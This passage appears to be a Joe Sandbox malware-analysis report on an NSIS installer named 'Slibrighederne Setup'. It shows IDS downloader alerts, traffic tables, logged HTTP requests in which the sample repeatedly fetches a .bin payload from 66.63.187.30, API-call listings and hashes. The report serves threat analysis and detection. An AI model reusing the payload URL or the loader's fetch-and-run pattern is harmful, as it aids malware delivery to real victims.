2025-01-10T18:45:10.438851+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	62545	66.63.187.30	80	TCP
2025-01-10T18:45:41.846520+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	62742	66.63.187.30	80	TCP
2025-01-10T18:46:13.238160+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	62771	66.63.187.30	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:43:59.547799110 CET	62496	53	192.168.2.8	162.159.36.2
Jan 10, 2025 18:43:59.552705050 CET	53	62496	162.159.36.2	192.168.2.8
Jan 10, 2025 18:43:59.552792072 CET	62496	53	192.168.2.8	162.159.36.2
Jan 10, 2025 18:43:59.557646036 CET	53	62496	162.159.36.2	192.168.2.8
Jan 10, 2025 18:44:00.021683931 CET	62496	53	192.168.2.8	162.159.36.2
Jan 10, 2025 18:44:00.026659012 CET	53	62496	162.159.36.2	192.168.2.8
Jan 10, 2025 18:44:00.026743889 CET	62496	53	192.168.2.8	162.159.36.2
Jan 10, 2025 18:44:17.614430904 CET	62501	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:17.619267941 CET	80	62501	66.63.187.30	192.168.2.8
Jan 10, 2025 18:44:17.619333982 CET	62501	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:17.619534016 CET	62501	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:17.624336004 CET	80	62501	66.63.187.30	192.168.2.8
Jan 10, 2025 18:44:38.985685110 CET	80	62501	66.63.187.30	192.168.2.8
Jan 10, 2025 18:44:38.985836029 CET	62501	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:38.986668110 CET	62501	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:38.992228031 CET	80	62501	66.63.187.30	192.168.2.8
Jan 10, 2025 18:44:49.074996948 CET	62545	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:49.079857111 CET	80	62545	66.63.187.30	192.168.2.8
Jan 10, 2025 18:44:49.079916000 CET	62545	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:49.082113028 CET	62545	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:44:49.086828947 CET	80	62545	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:10.438780069 CET	80	62545	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:10.438851118 CET	62545	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:10.438962936 CET	62545	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:10.443759918 CET	80	62545	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:20.449126005 CET	62742	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:20.454009056 CET	80	62742	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:20.454103947 CET	62742	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:20.454258919 CET	62742	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:20.459043980 CET	80	62742	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:41.846345901 CET	80	62742	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:41.846519947 CET	62742	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:41.846684933 CET	62742	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:41.851526976 CET	80	62742	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:51.857522011 CET	62771	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:51.862471104 CET	80	62771	66.63.187.30	192.168.2.8
Jan 10, 2025 18:45:51.862560034 CET	62771	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:51.862773895 CET	62771	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:45:51.867538929 CET	80	62771	66.63.187.30	192.168.2.8
Jan 10, 2025 18:46:13.237919092 CET	80	62771	66.63.187.30	192.168.2.8
Jan 10, 2025 18:46:13.238159895 CET	62771	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:46:13.238310099 CET	62771	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:46:13.243401051 CET	80	62771	66.63.187.30	192.168.2.8
Jan 10, 2025 18:46:23.245652914 CET	62772	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:46:23.250535965 CET	80	62772	66.63.187.30	192.168.2.8
Jan 10, 2025 18:46:23.250636101 CET	62772	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:46:23.250730991 CET	62772	80	192.168.2.8	66.63.187.30
Jan 10, 2025 18:46:23.258133888 CET	80	62772	66.63.187.30	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:43:59.547291994 CET	53	55791	162.159.36.2	192.168.2.8
Jan 10, 2025 18:44:00.036348104 CET	61811	53	192.168.2.8	1.1.1.1
Jan 10, 2025 18:44:00.044504881 CET	53	61811	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 18:44:00.036348104 CET	192.168.2.8	1.1.1.1	0xe467	Standard query (0)	18.31.95.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 18:44:00.044504881 CET	1.1.1.1	192.168.2.8	0xe467	Name error (3)	18.31.95.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

66.63.187.30

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	62501	66.63.187.30	80	4416	C:\Users\user\Desktop\xLDz0WPZYc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:44:17.619534016 CET	175	OUT	GET /AmDxXYvcZBeoV9.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 66.63.187.30 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	62545	66.63.187.30	80	4416	C:\Users\user\Desktop\xLDz0WPZYc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:44:49.082113028 CET	175	OUT	GET /AmDxXYvcZBeoV9.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 66.63.187.30 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	62742	66.63.187.30	80	4416	C:\Users\user\Desktop\xLDz0WPZYc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:45:20.454258919 CET	175	OUT	GET /AmDxXYvcZBeoV9.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 66.63.187.30 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	62771	66.63.187.30	80	4416	C:\Users\user\Desktop\xLDz0WPZYc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:45:51.862773895 CET	175	OUT	GET /AmDxXYvcZBeoV9.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 66.63.187.30 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	62772	66.63.187.30	80	4416	C:\Users\user\Desktop\xLDz0WPZYc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:46:23.250730991 CET	175	OUT	GET /AmDxXYvcZBeoV9.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 66.63.187.30 Cache-Control: no-cache

Target ID:	0
Start time:	12:43:26
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\xLDz0WPZYc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xLDz0WPZYc.exe"
Imagebase:	0x400000
File size:	576'325 bytes
MD5 hash:	74E2251DFA1E7FBEB0E4E9BA2F6C56B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:44:08
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\xLDz0WPZYc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xLDz0WPZYc.exe"
Imagebase:	0x400000
File size:	576'325 bytes
MD5 hash:	74E2251DFA1E7FBEB0E4E9BA2F6C56B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.7%
Dynamic/Decrypted Code Coverage:	14.6%
Signature Coverage:	20.3%
Total number of Nodes:	1429
Total number of Limit Nodes:	38

Executed Functions

Function 004030B6 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 337
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004030D7
SetErrorMode.KERNELBASE(00008001), ref: 004030E2
OleInitialize.OLE32(00000000), ref: 004030E9

Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
Part of subcall function 00405EE8: LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16

SHGetFileInfoA.SHELL32(0041EC98,00000000,?,?,00000000,00000009), ref: 00403111

Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,Slibrighederne Setup,NSIS Error), ref: 00405BCA

GetCommandLineA.KERNEL32(Slibrighederne Setup,NSIS Error), ref: 00403126
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\xLDz0WPZYc.exe",00000000), ref: 00403139
CharNextA.USER32(00000000,"C:\Users\user\Desktop\xLDz0WPZYc.exe",00000020), ref: 00403164
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403261
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403272
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040327E
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403292
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040329A
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032AB
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032B3
DeleteFileA.KERNELBASE(1033), ref: 004032C7
OleUninitialize.OLE32(?), ref: 00403375
ExitProcess.KERNEL32 ref: 00403395
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\xLDz0WPZYc.exe",00000000,?), ref: 004033A1
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033AD
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033B9
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033C0
DeleteFileA.KERNEL32(0041E898,0041E898,?,00424000,?), ref: 00403419
CopyFileA.KERNEL32(C:\Users\user\Desktop\xLDz0WPZYc.exe,0041E898,?), ref: 0040342D
CloseHandle.KERNEL32(00000000,0041E898,0041E898,?,0041E898,00000000), ref: 0040345A
GetCurrentProcess.KERNEL32(?,?,00000006,00000005,?), ref: 004034B3
ExitWindowsEx.USER32(00000002,80040002), ref: 0040350B
ExitProcess.KERNEL32 ref: 0040352E

Strings

C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 00403246, 00403347, 004033C6, 004033CF
NSIS Error, xrefs: 00403117
C:\Users\user\Desktop, xrefs: 004033A6, 004033AB, 004033CE
\Temp, xrefs: 00403278
TEMP, xrefs: 004032A6
~nsu.tmp, xrefs: 0040339B
Error launching installer, xrefs: 0040332D
C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 00403352
Slibrighederne Setup, xrefs: 0040311C
", xrefs: 00403189
Low, xrefs: 00403294
C:\Users\user\Desktop\xLDz0WPZYc.exe, xrefs: 00403428
SeShutdownPrivilege, xrefs: 004034C5
1033, xrefs: 004032C2
TMP, xrefs: 004032AE
C:\Users\user\AppData\Local\Temp\, xrefs: 00403256, 0040325B, 00403271, 0040327D, 0040328C, 00403299, 004032A5, 004032AD, 004033A0, 004033AC, 004033B8, 004033BF, 0040346E
"C:\Users\user\Desktop\xLDz0WPZYc.exe", xrefs: 0040312C, 00403132, 004032EB

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\xLDz0WPZYc.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Studerekammermenneskes$C:\Users\user\AppData\Roaming\Studerekammermenneskes$C:\Users\user\Desktop$C:\Users\user\Desktop\xLDz0WPZYc.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Slibrighederne Setup$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-543464678
Opcode ID: 0465aa0a361c9d0fa04965402fa3df5ad1a355ba9c919688d6d4795c9475ec4c
Instruction ID: 19acd6a9e22a62aa3fa635d9352380a3979e711e0520c28b60a65d3217cef685
Opcode Fuzzy Hash: 0465aa0a361c9d0fa04965402fa3df5ad1a355ba9c919688d6d4795c9475ec4c
Instruction Fuzzy Hash: 87B1E370A082516AE7216F755C89B2B7EACEB45306F04057FF581B62D2C77C9E01CB6E

Function 00404FE4 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405043
GetDlgItem.USER32(?,000003EE), ref: 00405052
GetClientRect.USER32(?,?), ref: 0040508F
GetSystemMetrics.USER32(00000002), ref: 00405096
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004050B7
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050C8
SendMessageA.USER32(?,00001001,00000000,?), ref: 004050DB
SendMessageA.USER32(?,00001026,00000000,?), ref: 004050E9
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050FC
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040511E
ShowWindow.USER32(?,?), ref: 00405132
GetDlgItem.USER32(?,000003EC), ref: 00405153
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405163
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040517C
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405188
GetDlgItem.USER32(?,000003F8), ref: 00405061

Part of subcall function 00403EA8: SendMessageA.USER32(?,?,?,00403CD9), ref: 00403EB6

GetDlgItem.USER32(?,000003EC), ref: 004051A4
CreateThread.KERNELBASE(00000000,00000000,Function_00004F78,00000000), ref: 004051B2
CloseHandle.KERNELBASE(00000000), ref: 004051B9
ShowWindow.USER32(00000000), ref: 004051DC
ShowWindow.USER32(?,?), ref: 004051E3
ShowWindow.USER32(?), ref: 00405229
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040525D
CreatePopupMenu.USER32 ref: 0040526E
AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405283
GetWindowRect.USER32(?,000000FF), ref: 004052A3
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004052BC
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F8
OpenClipboard.USER32(00000000), ref: 00405308
EmptyClipboard.USER32 ref: 0040530E
GlobalAlloc.KERNEL32(00000042,?), ref: 00405317
GlobalLock.KERNEL32(00000000), ref: 00405321
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405335
GlobalUnlock.KERNEL32(00000000), ref: 0040534E
SetClipboardData.USER32(?,00000000), ref: 00405359
CloseClipboard.USER32 ref: 0040535F

Strings

Slibrighederne Setup: Installing, xrefs: 004052D4
liy, xrefs: 00405233

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Slibrighederne Setup: Installing$liy
API String ID: 590372296-3266460490
Opcode ID: b8267ac34de08bb18752529e459f06683afd16ea86d55fa50f92f6cf035c2f36
Instruction ID: 5eb751775e690fc0911b0246dac1cecdda29a979763143f7b886e47eaa108cfb
Opcode Fuzzy Hash: b8267ac34de08bb18752529e459f06683afd16ea86d55fa50f92f6cf035c2f36
Instruction Fuzzy Hash: 8AA16971900208BFDB219FA0DD89EAE7F79FB08345F10407AFA01B61A0C7B55E519FA9

Function 00405BDF Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,00404EDE,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000), ref: 00405C90
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405D0B
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405D1E
SHGetSpecialFolderLocation.SHELL32(?,0040E888), ref: 00405D5A
SHGetPathFromIDListA.SHELL32(0040E888,Call), ref: 00405D68
CoTaskMemFree.OLE32(0040E888), ref: 00405D73
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D95
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,00404EDE,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000), ref: 00405DE7

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CDA
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D8F
Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll, xrefs: 00405C0E
Call, xrefs: 00405C06, 00405CD8, 00405CF5, 00405D0A, 00405D1D, 00405D39, 00405D64, 00405D94, 00405D9A, 00405DB2, 00405DC5, 00405DE0, 00405DE6, 00405DF1, 00405E1B

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2998629967
Opcode ID: 6d1c9af88ffa3db3a0edcf81b4fc072c50c4b8bcf17ecc15cdbe89ff62f1b448
Instruction ID: 05ce3077703b195791b94b96109b54625272672628b9f98d23919b5af99ad588
Opcode Fuzzy Hash: 6d1c9af88ffa3db3a0edcf81b4fc072c50c4b8bcf17ecc15cdbe89ff62f1b448
Instruction Fuzzy Hash: 0A610171A04A05AAEB205F24DC88BBF7BB4EF11304F50813BE941B62D0D27D5982DF8E

Function 0040547D Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004054A6
lstrcatA.KERNEL32(00420CE0,\*.*,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004054EE
lstrcatA.KERNEL32(?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 0040550F
lstrlenA.KERNEL32(?,?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 00405515
FindFirstFileA.KERNELBASE(00420CE0,?,?,?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 00405526
FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055D3
FindClose.KERNEL32(00000000), ref: 004055E4

Strings

\*.*, xrefs: 004054E8
C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
"C:\Users\user\Desktop\xLDz0WPZYc.exe", xrefs: 0040547D

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\xLDz0WPZYc.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-777657853
Opcode ID: 2f5cc935bd14faa83787e20be2be6e70cf428fbcf334f354c204533ca760d941
Instruction ID: f67e5f98a1b48f8b06c5baa1d65efce896aecc78963fcddf766b22b57dd7cee7
Opcode Fuzzy Hash: 2f5cc935bd14faa83787e20be2be6e70cf428fbcf334f354c204533ca760d941
Instruction Fuzzy Hash: 1851C070800A04BADF21AB25CC45BAF7AB9DB42314F14417BF444752D6D73C9A82DEAD

Function 00406197 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
Instruction ID: 01902b0c5badf26c21563370f74918c90dc48b9c290b8d647ce642e1aeaa84f8
Opcode Fuzzy Hash: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
Instruction Fuzzy Hash: 99F18671D00229CBDF28CFA8C8946ADBBB0FF45305F25856ED856BB281D7385A96CF44

Function 00405EC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,00421528,C:\Users\user\AppData\Local\Temp\nst7960.tmp,0040577E,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410), ref: 00405ECC
FindClose.KERNEL32(00000000), ref: 00405ED8

Strings

C:\Users\user\AppData\Local\Temp\nst7960.tmp, xrefs: 00405EC1

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nst7960.tmp
API String ID: 2295610775-3518439782
Opcode ID: f7c2684b86b1527493efd370d531fce5aff0e856747922587c11eb9b8a6dacaa
Instruction ID: c8363a8003639f247cd95da1b4b67004b06b28060bca14ca5f7d033ebcfdecfd
Opcode Fuzzy Hash: f7c2684b86b1527493efd370d531fce5aff0e856747922587c11eb9b8a6dacaa
Instruction Fuzzy Hash: 9ED012369194206BC7005B78AC0C85B7A98EF593317608A33B5A5F52F0C7788D528AEA

Function 00405EE8 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
GetProcAddress.KERNEL32(00000000,?), ref: 00405F16

Memory Dump Source

